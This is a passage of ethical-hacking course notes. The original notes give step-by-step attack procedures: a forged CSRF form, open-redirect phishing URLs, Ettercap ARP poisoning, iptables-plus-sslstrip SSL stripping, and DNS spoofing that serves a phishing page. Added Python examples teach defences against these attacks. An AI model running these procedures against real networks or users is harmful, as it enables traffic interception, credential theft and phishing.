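def escape_for_html(user_input):
    """Entity-encode the HTML metacharacters (< > & " '); the browser renders them as text."""
    return html.escape(user_input, quote=True)


def render(user_input, encoder=escape_for_html):
    """The reflection point: a constructed page that echoes a 'name' parameter into its body."""
    return "<p>Hello, %s</p>" % encoder(user_input)


def still_markup(fragment):
    """True if the (already processed) user fragment can still open a tag."""
    return TAG_START.search(fragment) is not None


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("%-60s filter->%-5s escape->%s" % (payload,
              still_markup(naive_filter(payload)), still_markup(escape_for_html(payload))))
```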
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 16
- ==========
- CSRF --> Cross Site Request Forgery
- ===================================
- It is a client-side attack, in which an attacker crafts a malicious link and sends it to the target. Using that link the attacker can make the target carry out his malicious intents. In this attack, the attacker does not get any kind of data.
- Step 1--> Open the CSRF Vulnerable Website
- Step 2--> Select the element
- Step 3--> Right Click The selected element--->Inspect Code
- Step 4--> Choose the whole form
- Step 5--> Right Click --> Edit as HTML
- Step 6--> Copy the whole code
- Step 7--> Paste in notepad --> change the Action field
- Step 8--> Save as .html file and send/upload the link
- Demo
- ====
- <html>
- <img src="https://i.ytimg.com/vi/i_FbQzQQQLI/maxresdefault.jpg">
- <form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/" method="GET"> New password:<br>
- <input autocomplete="off" name="password_new" type="password"><br>
- Confirm new password: <br>
- <input autocomplete="off" name="password_conf" type="password">
- <br>
- <input value="Change" name="Change" type="submit">
- </form>
- </html>
- This is only possible if my website or web application is on a shared hosting server.
- yougetsignal.com
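- The server-side defence for the demo above, as an added example that is not part of the original notes: the password-change form carries a token derived from the victim's session, the handler checks it with a constant-time compare before touching any state, and only POST is accepted. The form path is taken from the demo; the session ids and the server secret are constructed.

```python
"""Anti-CSRF token for the password-change form in the demo above.

Added example (not from the original notes). The attacker's page in the demo
works because the browser attaches the victim's cookies to any request, and
the form needs nothing the attacker cannot know. A token derived from the
victim's session, embedded in the real form and checked on the server, is
exactly that unknowable value. Session ids and the secret here are constructed.
"""
import hashlib
import hmac
import secrets

# Per-deployment secret; in production it lives in configuration, not source.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Bind the token to the session so one user's token is useless for another's."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_password_form(session_id):
    """The DVWA-style form from the demo, now POST and carrying the session's token."""
    return (
        '<form action="/dvwa/vulnerabilities/csrf/" method="POST">\n'
        '<input type="hidden" name="csrf_token" value="%s">\n'
        'New password:<br><input autocomplete="off" name="password_new" type="password"><br>\n'
        'Confirm new password:<br><input autocomplete="off" name="password_conf" type="password"><br>\n'
        '<input value="Change" name="Change" type="submit">\n'
        '</form>' % csrf_token(session_id)
    )


def handle_change_password(method, session_id, form):
    """Server side. Returns (status, message); the token check comes before any state change."""
    if method != "POST":
        return 405, "password changes are only accepted by POST"
    expected = csrf_token(session_id)
    if not hmac.compare_digest(form.get("csrf_token", ""), expected):
        return 403, "missing or foreign CSRF token"
    if not form.get("password_new") or form.get("password_new") != form.get("password_conf"):
        return 400, "passwords missing or do not match"
    return 200, "password changed"


if __name__ == "__main__":
    victim = "sess-victim-0001"
    forged = {"password_new": "x", "password_conf": "x"}   # what the attacker's page can send
    print(handle_change_password("POST", victim, forged))   # (403, ...)
```

A SameSite=Lax or Strict attribute on the session cookie adds a second, independent barrier.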
- Missing Function Level Access Control
- =====================================
- Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
- If there are n number of users
- user 1 --> prashant ---> prashant.php
- user 2 --> rudra -----> rudra.php
- user 3 --> aranjit ---> aranjit.php
- user 4 --> brijesh ----> brijesh.php
- user 5 --> attacker --> Abhijeet ----> Abhijeet.php
- Instead of Abhijeet.php, he will enter prashant.php and will get access to Prashant's account without any authentication.
- oyorooms.com/user/asodf?id= abhijeet.php
- abhishek.php
- rahul.php
- sanjeev.php
- kartik.php
- neha.php
- admin.php
- Unvalidated Redirects and Forwards
- ==================================
- Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
- 127.0.0.1/skdv/redirectTo=welcome.php
- phishingpage.com
- https://www.tinies.com/redirectTo.php?u=http%3A%2F%2Fwww.sapnagroup.com
- https://www.tinies.com/redirectTo.php?u=http://www.lucideus.com
- https://lucideustest.000webhostapp.com/form.html
- Phishing Page
- https://www.tinies.com/redirectTo.php?u=https://lucideustest.000webhostapp.com/form.html
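- Validating the redirectTo parameter from the examples above, as an added example that is not part of the original notes: safe_redirect_target() returns a same-site path or an allow-listed absolute URL and falls back to a fixed page for everything else, including the plain and %-encoded http:// forms shown above. ALLOWED_HOSTS and DEFAULT_PAGE are constructed for the example.

```python
"""Validating the redirectTo parameter from the examples above.

Added example (not from the original notes): safe_redirect_target() returns a
destination that stays on the site, or a fixed default. ALLOWED_HOSTS and the
default page are constructed for the example.
"""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"www.tinies.com"}   # absolute URLs are only followed to these hosts
DEFAULT_PAGE = "/welcome.php"


def safe_redirect_target(raw):
    """Accept a same-site path or an allow-listed absolute URL; anything else falls back.

    Handles the forms in the notes (plain and %-encoded http://...) and the
    usual parser tricks: protocol-relative '//host', backslashes that browsers
    read as slashes, userinfo '@', CRLF for header injection, and
    javascript:/data: schemes.
    """
    if not raw:
        return DEFAULT_PAGE
    target = unquote(raw).strip().replace("\\", "/")
    if any(ord(c) < 32 or c == "\x7f" for c in target):
        return DEFAULT_PAGE                       # control characters never belong in a Location
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute (or protocol-relative) URL: only http(s) to an allow-listed host.
        if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
            return parts.geturl()
        return DEFAULT_PAGE
    if target.startswith("//"):                   # defensive; urlsplit already put this in netloc
        return DEFAULT_PAGE
    return target if target.startswith("/") else "/" + target


if __name__ == "__main__":
    for raw in ("welcome.php", "http://www.lucideus.com",
                "http%3A%2F%2Fwww.sapnagroup.com", "https://www.tinies.com/account"):
        print("%-45s -> %s" % (raw, safe_redirect_target(raw)))
```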
- Tools To Automate VAPT
- ======================
- Netsparker
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 17
- ==========
- Linux Basics
- ------------
- Linux is derived from the word Unix. Unix was the first OS. Unix was used by government officials and was not used by the common man.
- Unix Problems
- -------------
- 1. Gov. Officials
- 2. If someone needs to operate it, he/she needs to have complete knowledge of the commands.
- Linus Torvalds
- =============
- He created linux OS. Kernel ---> deploy.
- Open source. --> Anyone can download it, modify it and upload it. And it can be used for our own purpose.
- Kernel ---> Modify ---> Publish --> Copyright
- Linux Kernel ----> Modify ----> Networking ----> Red Hat
- Linux Kernel ----> Modify ----> Application Dev. ----> Fedora
- Linux Kernel ----> GUI ---> User Friendly ----> Ubuntu ---> FoC
- File Architecture
- ------------------
- There are predefined folders, each with a predefined functionality.
- 1. root --> /
- 2. etc --> Configuration Folder
- It contains all the configuration files
- .conf
- 3. bin --> binary folder
- It contains all the binary files of the Linux terminal commands.
- 4. Proc --> Process Folder
- It contains all the process files
- up-time
- time-stat
- 5. Media --> Devices ---> storage Media
- 6. VAR --> Variable Folder
- Files whose size is not static. The size of the file keeps on increasing.
- temp
- log
- mail
- server
- 7. dev --> Device Folder
- ----> Devices which are currently used by the machine and the OS.
- 8. Home ---> Users ---> contains all the user's data and files
- Linux always treats everything as a file.
- Some Basic Commands
- ===================
- cd---> change directory
- ls---> list directory
- man--> to get the manual of a command
- mkdir--> to make a directory in linux
- cp--> copy a file to another folder
- mv---> move a file to another location
- rm --> to remove a file only
- rmdir---> remove directory
- grep--> to check whether a word is in the file or not
- cat --> to read the contents of the file
- locate --> to locate a specific file----> find any file
- echo --> make a sound... make noise... and say it... to print something on the terminal
- date --> today's date, along with the time.... for viewing the current date and time
- cal --> this will open up the whole calendar of the entire month for you....
- uname --> this tells you about your Linux system.....
- uname -a --> this will give all the information about your Linux system, such as
- 1. who is the user
- 2. what is the version
- 3. which operating system you are using
- 4. time
- 5. date
- when all the work is done.... we will use init 0----. for shutting down the device
- Users and Group
- ===============
- group --> putting similar users together in one room----> collecting and grouping similar users in a group
- -rw-r--r-- 1 root root 1031 Nov 18 09:22 /etc/passwd
- The next three characters (rw-) define the owner’s permission to the file. In this example, the file owner has read and write permissions only. The next three characters (r--) are the permissions for the members of the same group as the file owner (which in this example is read only). The last three characters (r--) show the permissions for all other users and in this example it is read only.
- chmod --> we can change the way any file is executed.... or we can set which user can run or use this file
- this also has different ways of doing it
- chmod 754 filename
- 4 stands for "read",
- 2 stands for "write",
- 1 stands for "execute", and
- 0 stands for "no permission."
- So 7 is the combination of permissions 4+2+1 (read, write, and execute), 5 is 4+0+1 (read, no write, and execute), and 4 is 4+0+0 (read, no write, and no execute).
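- Converting between the ls-style string from the /etc/passwd listing and the numeric chmod argument explained above, as an added example that is not part of the original notes; world_writable() is the check a reviewer runs over a listing. The function names are constructed.

```python
"""Converting between the ls-style and numeric forms of the permissions explained above.

Added example (not from the original notes): symbolic_to_octal() reads the
'-rw-r--r--' string from the /etc/passwd listing and octal_to_symbolic()
reads a 'chmod 754' argument.
"""
WEIGHTS = (4, 2, 1)   # read, write, execute, as in the notes


def symbolic_to_octal(mode):
    """'-rw-r--r--' or 'rw-r--r--' -> '644'; 'rwxr-xr--' -> '754'.

    's'/'t' in the execute slot (setuid, setgid, sticky) count as executable;
    'S'/'T' mean the special bit is set but execute is not.
    """
    if len(mode) == 10:
        mode = mode[1:]   # drop the file-type character ('-', 'd', 'l', ...)
    if len(mode) != 9:
        raise ValueError("expected 9 permission characters, got %r" % mode)
    digits = []
    for start in (0, 3, 6):
        value = 0
        for ch, expected, weight in zip(mode[start:start + 3], "rwx", WEIGHTS):
            if ch == expected or (expected == "x" and ch in "st"):
                value += weight
            elif ch not in "-ST":
                raise ValueError("unexpected character %r in %r" % (ch, mode))
        digits.append(str(value))
    return "".join(digits)


def octal_to_symbolic(octal):
    """'754' -> 'rwxr-xr--', the inverse, for reading a chmod argument."""
    if len(octal) != 3 or any(c not in "01234567" for c in octal):
        raise ValueError("expected three octal digits, got %r" % octal)
    out = []
    for digit in octal:
        n = int(digit)
        out.append(("r" if n & 4 else "-") + ("w" if n & 2 else "-") + ("x" if n & 1 else "-"))
    return "".join(out)


def describe(octal):
    """Spell out each class, e.g. describe('754')['group'] == 'read, execute'."""
    names = ("read", "write", "execute")
    sym = octal_to_symbolic(octal)
    result = {}
    for who, start in zip(("owner", "group", "others"), (0, 3, 6)):
        granted = [name for ch, name in zip(sym[start:start + 3], names) if ch != "-"]
        result[who] = ", ".join(granted) or "no permission"
    return result


def world_writable(mode):
    """True when 'others' can write: the permission a reviewer looks for first."""
    return symbolic_to_octal(mode)[2] in "2367"


if __name__ == "__main__":
    print(symbolic_to_octal("-rw-r--r--"), octal_to_symbolic("754"), describe("754"))
```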
- su --> to change user---> if you don't want to do some work yourself.... you will ask either your friend or one of your brothers....
- sudo --> super user do ---> asking dad to do some work... which the son cannot do
- sudo adduser <username>
- Basic Networking
- ================
- now everything is set up.... now I want to set up an internet connection and see its IP address and configuration... so I will use 'ifconfig'
- ifconfig --> interface configuration
- route -n
- ping
- traceroute
- nslookup
- netstat
- crunch <min-length> <max-length>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 18
- ==========
- Network Security
- ----------------
- Information Gathering ---> Network Based
- ----------------------------------------
- In this type of information gathering we prefer to gather the information about the network.
- Number of connected device
- IP Allocated
- MAC Address
- Host Name
- 1. Normal Information Gathering
- 2. Advanced|Intelligent Information Gathering
- 1. Normal Information Gathering
- -------------------------------
- In this type of information gathering, we just get limited data:
- IP Address
- MAC Address
- Vendor Name
- netdiscover
- netdiscover -r 192.168.228.1/24
- arp-scan
- arp-scan --local
- 2. Advanced|Intelligent Information Gathering
- --------------------------------------------
- In this type of information gathering, we get the information in the very granular way.
- IP Addresses
- Port number
- Services
- Service Version
- OS
- OS Version
- nmap --> Network Mapping and exploration tool
- nmap 192.168.228.1-255
- nmap 192.168.228.1/24
- nmap 192.168.228.1-255 -sS -sC -sV
- -sS ---> Service
- -sC ---> More Details
- -sV ---> Version
- Network Attacks
- ---------------
- Free WiFi
- --> CCD
- --> Railway Station
- --> Star Bucks
- --> Costa Cafe
- --> Barista
- --> Subway
- Suppose there is an intruder on the free WiFi, and he is seeing all the data you are transmitting over the network.
- Username
- Passwords
- Which attack he is using?
- -------------------------
- MiTM --> Man In The Middle Attack
- An intruder is listening to and seeing (sniffing and spoofing) the data transmitted by the user. In other words, the attacker is standing between the two nodes of the communication; all the data is going through the attacker's device.
- ARP Poisoning
- ==============
- ARP --> Address Resolution Protocol
- ARP Table ---> Maps IP Address with the MAC Address
- In this attack, the attacker poisons the ARP cache.
- Ettercap ---> It is a tool which is used for performing MiTM and ARP Poisoning attacks in the network. It is pre-installed in Kali Linux.
- Attack
- ======
- 1. Information Gathering
- #arp-scan --local
- 2. Start Ettercap
- #ettercap -G
- G ---> Graphical Version
- Start MiTM Attack
- 1. Goto "Sniff"
- 2. Click on "Unified Sniffing"
- 3. Select the interface ---> eth0
- 4. Goto on "Hosts"
- 5. Click on "Scan For Hosts"
- 6. Goto on "Hosts"
- 7. Click on "Hosts List"
- 192.168.228.137 ---> Target
- Router --> Default Gateway
- #route -n
- 192.168.228.2
- 8. Select default gateway --> 192.168.228.2 ---> Click on "Add To Target 1"
- 9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
- 10. Goto "MiTM"
- 11. Click on "ARP Poisoning"
- 12. Check on "Sniff Remote Connections" and click on "OK"
- 13. Goto "Start"
- 14. Click on "Start Sniffing"
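- Detecting the poisoning from the target's side, as an added example that is not part of the original notes: two constructed `arp -n` snapshots of the 192.168.228.0/24 lab network, one before and one after the default gateway entry has been overwritten, and a checker that flags a gateway MAC change or one MAC answering for several IPs. The MAC addresses are constructed.

```python
"""ARP-cache checks that reveal the poisoning described above.

Added example (not from the original notes): the two snapshots are constructed
`arp -n` output as seen on the target 192.168.228.137, before and after its
entry for the gateway 192.168.228.2 has been overwritten.
"""
import re
from collections import defaultdict

ARP_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.228.2            ether   00:50:56:aa:bb:01   C                     eth0
192.168.228.50           ether   08:00:27:12:34:56   C                     eth0
"""

# After poisoning: the gateway now resolves to the same MAC as another host.
ARP_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.228.2            ether   08:00:27:de:ad:01   C                     eth0
192.168.228.50           ether   08:00:27:12:34:56   C                     eth0
192.168.228.66           ether   08:00:27:de:ad:01   C                     eth0
192.168.228.99           (incomplete)                                      eth0
"""

# IPv4 address, the HWtype column, then a colon-separated MAC; incomplete rows do not match.
ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+\S+\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I)


def parse_arp(text):
    """Return {ip: mac} for the resolved entries of an `arp -n` listing."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def arp_alerts(baseline, current, gateway):
    """Return alert strings: gateway MAC changed, or one MAC answering for several IPs."""
    alerts = []
    if gateway in baseline and gateway in current and baseline[gateway] != current[gateway]:
        alerts.append("gateway %s moved from %s to %s"
                      % (gateway, baseline[gateway], current[gateway]))
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append("MAC %s claims %s" % (mac, ", ".join(sorted(ips))))
    return alerts


if __name__ == "__main__":
    before, after = parse_arp(ARP_BEFORE), parse_arp(ARP_AFTER)
    for alert in arp_alerts(before, after, "192.168.228.2"):
        print("ALERT:", alert)
```

A static ARP entry for the gateway on critical hosts, or Dynamic ARP Inspection on the switch, stops the overwrite rather than just reporting it.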
- Working
- http://www.vivastreet.co.in
- "Secure Connection Failed"
- https://www.paytm.com
- https://www.linkedin.com
- https://www.instagram.com
- https://www.onlinesbi.com
- https://www.netflix.com
- HTTP --> Hyper Text Transfer Protocol
- HTTPS -> Hyper Text Transfer Protocol Secure
- |
- |--> S=Secure
- |->SSL
- Secure Socket Layer
- 443
- For performing MiTM and ARP Poisoning on HTTPS websites, we need to do SSL Stripping.
- For performing SSL stripping, we need to perform 3 steps
- 1. IP Forwarding
- 2. Traffic Redirection
- 3. SSL Stripping
- 1. IP Forwarding
- ================
- To set up IP forwarding and listen for the traffic which is transmitted by SSL.
- #more /proc/sys/net/ipv4/ip_forward
- 0
- #echo "1" > /proc/sys/net/ipv4/ip_forward
- #more /proc/sys/net/ipv4/ip_forward
- 1
- 2. Traffic Redirection
- ======================
- SSL works for port 80.
- Data transmitted over port number 80 will be encrypted and protected by SSL. So we will redirect the data from port 80 to any random port, let's say port number 8080.
- #locate etter.conf
- /etc/ettercap/etter.conf
- /usr/share/ettercap/doc/etter.conf.5.pdf
- /usr/share/man/man5/etter.conf.5.gz
- #nano /etc/ettercap/etter.conf
- ec_uid = 0 # nobody is the default
- ec_gid = 0 # nobody is the default
- Scroll Down Until You Find Something Like This
- #---------------
- # Linux
- #---------------
- You will find another line
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Copy that line and paste it in notepad
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- we need to modify this command.
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 --> This is my commmand
- #iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
- 3. SSL Stripping
- ===============
- Now everything is set up, we are good to go. Start the sslstrip tool and use it for port 8080
- #sslstrip -l 8080
- -l --> Listening
- Now we will perform MiTM and ARP Poisoning
- Start Ettercap
- #ettercap -G
- G ---> Graphical Version
- Start MiTM Attack
- 1. Goto "Sniff"
- 2. Click on "Unified Sniffing"
- 3. Select the interface ---> eth0
- 4. Goto on "Hosts"
- 5. Click on "Scan For Hosts"
- 6. Goto on "Hosts"
- 7. Click on "Hosts List"
- 192.168.228.137 ---> Target
- Router --> Default Gateway
- #route -n
- 192.168.228.2
- 8. Select default gateway --> 192.168.228.2 ---> Click on "Add To Target 1"
- 9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
- 10. Goto "MiTM"
- 11. Click on "ARP Poisoning"
- 12. Check on "Sniff Remote Connections" and click on "OK"
- 13. Goto "Start"
- 14. Click on "Start Sniffing"
- DNS Poisoning Attack | DNS Spoofing Attack
- ===========================================
- It will redirect the user to a phishing web page on the network
- www.facebook.com ----> It will go to my IP address where I have hosted another phishing page.
- #locate etter.conf
- /etc/ettercap/etter.conf
- /usr/share/ettercap/doc/etter.conf.5.pdf
- /usr/share/man/man5/etter.conf.5.gz
- #nano /etc/ettercap/etter.conf
- [privs]
- ec_uid = 1234234 # nobody is the default
- ec_gid = 4124123 # nobody is the default
- make ec_uid and ec_gid as 0
- I will scroll down until I find something written as
- -----
- LINUX
- -----
- # if you use iptables:
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Remove the hash from both lines
- # if you use iptables:
- redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- #ettercap -G
- Sniff ---> Unified Sniffing ---> Network Interface --> eth0
- Hosts ---> Scan For Hosts
- Hosts --> Hosts List
- Select the target 1 as the default gateway
- route -n
- 172.16.226.2
- Select the target 2 as the victim machine
- 172.16.226.154
- MiTM --> ARP Poisoning --> Sniff Remote Connection Only
- Goto "Plugins" --> Manage the Plugins
- Double click "dns_spoof"
- Start ---> Start sniffing
- #locate etter.dns
- /etc/ettercap/etter.dns
- #nano /etc/ettercap/etter.dns
- search where it is written
- www.microsoft.com A *.*.*.*
- enter below
- www.facebook.com A <your IP Address>
- facebook.com A <your IP Address>
- save the file and exit
- #service apache2 start
- /var/www/html/ ---> place your phishing page here
- Xerosploit
- ==========
- Go to google.com
- --> github xerosploit
- --> https://github.com/LionSec/xerosploit
- You will see a green button, ---> Clone or Download
- Copy that link
- --> https://github.com/LionSec/xerosploit.git
- Open a terminal in kali linux and type
- #git clone https://github.com/LionSec/xerosploit.git
- #cd xerosploit
- #python install.py
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 19 and Session 20
- =========================
- Wireless Security
- -----------------
- Wireless Technology
- -------------------
- WiFi --> Wireless Fidelity
- Bluetooth
- RFID
- IEEE 802.11(a|b|n)
- ------------------
- This is a set of standards, which tells me the following things
- -- Number of devices that can connect
- -- Maximum data transmission speed
- -- Protocols Support
- -- Area Cover
- WiFi
- ====
- 1. WEP
- 2. WPA|WPA2
- BSSID MAC address of the access point. In the Client section, a BSSID of "(not associated)" means that the client
- is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.
- PWR Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher
- you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal
- level reporting. If the PWR is -1 for a limited number of stations then this is for a packet which came
- from the AP to the client but the client transmissions are out of range for your card. Meaning you are
- hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal
- level reporting.
- RXQ Only shown when on a fixed channel. Receive Quality as measured by the percentage of packets (management
- and data frames) successfully received over the last 10 seconds. It's measured over all management and data
- frames. That's the clue, this allows you to read more things out of this value. Lets say you got 100 per‐
- cent RXQ and all 10 (or whatever the rate) beacons per second coming in. Now all of a sudden the RXQ drops
- below 90, but you still capture all sent beacons. Thus you know that the AP is sending frames to a client
- but you can't hear the client nor the AP sending to the client (need to get closer). Another thing would
- be, that you got a 11MB card to monitor and capture frames (say a prism2.5) and you have a very good posi‐
- tion to the AP. The AP is set to 54MBit and then again the RXQ drops, so you know that there is at least
- one 54MBit client connected to the AP.
- Beacons
- Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate
- (1M), so they can usually be picked up from very far.
- #Data Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
- #/s Number of data packets per second measure over the last 10 seconds.
- CH Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even
- if airodump-ng is not hopping, because of radio interference.
- MB Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are
- 802.11g. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has
- QoS (802.11e) enabled.
- ENC Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between
- WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP
- or CCMP or MGT is present.
- CIPHER The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically
- used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater than
- 0. The standard states that the index can be 0-3 for 40-bit and should be 0 for 104-bit.
- AUTH The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared
- key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
- WPS This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the
- column indicates the version supported. The second field indicates WPS config methods (can be more than one
- method, separated by comma): USB = USB method, ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC =
- External NFC, INTNFC = Internal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD = Keypad. Locked is
- displayed when AP setup is locked.
- ESSID The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump-ng will try to
- recover the SSID from probe responses and association requests.
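- To make the column descriptions above concrete, here is an added Python example (not from the original notes and not code from the aircrack-ng project) that parses constructed airodump-ng-style AP rows, decodes the MB, ENC, CIPHER and AUTH fields as described, and turns them into the findings a wireless audit would report. The sample rows, BSSIDs and ESSIDs are made up, and the row regex assumes the column order listed above (BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID); a real run would feed it the terminal output of a fixed-channel capture instead.

```python
"""Added example: parse airodump-ng style AP rows and rate each network.

Not part of the original notes or of the aircrack-ng project. The rows in
SAMPLE_OUTPUT are constructed for this example (made-up BSSIDs and ESSIDs);
the column order BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
follows the field descriptions in the notes.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_OUTPUT = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 AA:BB:CC:00:00:01  -48  95      812       45    3   6  54e. WPA2 CCMP   PSK  Office-Main
 AA:BB:CC:00:00:02  -71  80      310        0    0   6  54   WPA  TKIP   PSK  Legacy Printer AP
 AA:BB:CC:00:00:03  -60  92      600      130   12  11  11   WEP  WEP    SKA  OldCam
 AA:BB:CC:00:00:04   -1   0      120        0    0   1  54e  OPN              Guest
 AA:BB:CC:00:00:05  -55  88      404        7    1   6  54e. WPA2 CCMP   MGT  Corp-Secure
"""

# One AP row. The optional groups absorb the blank CIPHER/AUTH columns an open
# network leaves; everything after AUTH is the ESSID (it may contain spaces).
ROW_RE = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+"
    r"(?P<data>\d+)\s+(?P<ps>\d+)\s+(?P<ch>\d+)\s+"
    r"(?P<mb>\d+[e.]*)\s+"
    r"(?P<enc>OPN|WEP\??|WPA2?)\s+"
    r"(?:(?P<cipher>CCMP|WRAP|TKIP|WEP104|WEP40|WEP)\s+)?"
    r"(?:(?P<auth>MGT|SKA|PSK|OPN)\s+)?"
    r"(?P<essid>.*?)\s*$"
)


@dataclass
class AccessPoint:
    bssid: str
    pwr: Optional[int]      # None when the driver reports -1 (no signal level support)
    rxq: int
    beacons: int
    data: int
    rate_mb: int
    short_preamble: bool    # trailing '.' in the MB column
    qos: bool               # 'e' in the MB column: 802.11e QoS enabled
    channel: int
    enc: str
    cipher: Optional[str]
    auth: Optional[str]
    essid: str

    @property
    def phy(self) -> str:
        """Rule from the notes: MB 11 -> 802.11b, 22 -> 802.11b+, higher -> 802.11g."""
        if self.rate_mb <= 11:
            return "802.11b"
        if self.rate_mb == 22:
            return "802.11b+"
        return "802.11g"


def parse_rows(text: str) -> List[AccessPoint]:
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, blank line, or a row from the STATION section
        pwr = int(m["pwr"])
        mb = m["mb"]
        aps.append(AccessPoint(
            bssid=m["bssid"].upper(),
            pwr=None if pwr == -1 else pwr,
            rxq=int(m["rxq"]),
            beacons=int(m["beacons"]),
            data=int(m["data"]),
            rate_mb=int(mb.rstrip("e.")),
            short_preamble=mb.endswith("."),
            qos="e" in mb,
            channel=int(m["ch"]),
            enc=m["enc"],
            cipher=m["cipher"],
            auth=m["auth"],
            essid=m["essid"] or "<hidden>",   # empty ESSID means SSID hiding is on
        ))
    return aps


def assess(ap: AccessPoint) -> Tuple[str, str]:
    """Map the ENC/CIPHER/AUTH columns to the finding a wireless audit would report."""
    if ap.enc == "OPN":
        return "critical", "no encryption: all traffic is readable over the air"
    if ap.enc.startswith("WEP"):
        return "critical", "WEP: deprecated, key recoverable from captured IVs"
    if ap.enc == "WPA" or ap.cipher == "TKIP":
        return "weak", "WPA/TKIP: legacy cipher, migrate to WPA2-CCMP or better"
    if ap.auth == "PSK":
        return "ok", "WPA2-CCMP with PSK: strength rests on the passphrase (captured handshake is attackable offline)"
    if ap.auth == "MGT":
        return "ok", "WPA2-CCMP with 802.1X (separate authentication server)"
    return "unknown", f"unrecognised combination {ap.enc}/{ap.cipher}/{ap.auth}"


def audit(text: str) -> List[Tuple[str, str, str]]:
    """Return (essid, level, reason) for every AP in the output, worst first."""
    order = {"critical": 0, "weak": 1, "unknown": 2, "ok": 3}
    findings = [(ap.essid, *assess(ap)) for ap in parse_rows(text)]
    return sorted(findings, key=lambda f: order[f[1]])


if __name__ == "__main__":
    for ap in parse_rows(SAMPLE_OUTPUT):
        level, why = assess(ap)
        print(f"{ap.bssid} ch{ap.channel:<2} {ap.phy:<9} {ap.essid!r:<22} {level:<8} {why}")
```

- The phy() rule is deliberately the one the notes give (11 = b, 22 = b+, higher = g); it says nothing about 802.11n/ac, which airodump-ng reports in the same MB column, so treat it as a reading aid rather than a fingerprint. The ESSID heuristic will also misparse a network whose name begins with one of the AUTH keywords.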
- WEP
- ===
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
